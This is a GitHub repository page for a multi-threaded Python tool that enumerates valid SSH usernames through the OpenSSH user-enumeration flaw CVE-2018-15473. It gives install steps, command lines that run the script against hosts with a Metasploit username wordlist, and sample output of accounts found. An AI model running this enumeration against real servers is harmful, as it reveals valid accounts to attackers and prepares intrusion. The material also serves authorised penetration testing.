Skip to content

Multi-threaded, IPv6 aware, wordlists/single-user username enumeration via CVE-2018-15473

License

Notifications You must be signed in to change notification settings

aidan-gibson/cve-2018-15473

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2018-15473

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

Still encountering error where it thinks every user is valid for some servers.

Install

Note: Tested with Python 3.7.14

You may need to install your distro's equivalent openssl-dev package

# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - OR - 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Examples

A single username

(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Use a wordlist with 10 threads (the default is 4)

(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

IPv6 Address on port 2222 and INCREASED VERBOSITY!

(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------

About

Multi-threaded, IPv6 aware, wordlists/single-user username enumeration via CVE-2018-15473

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%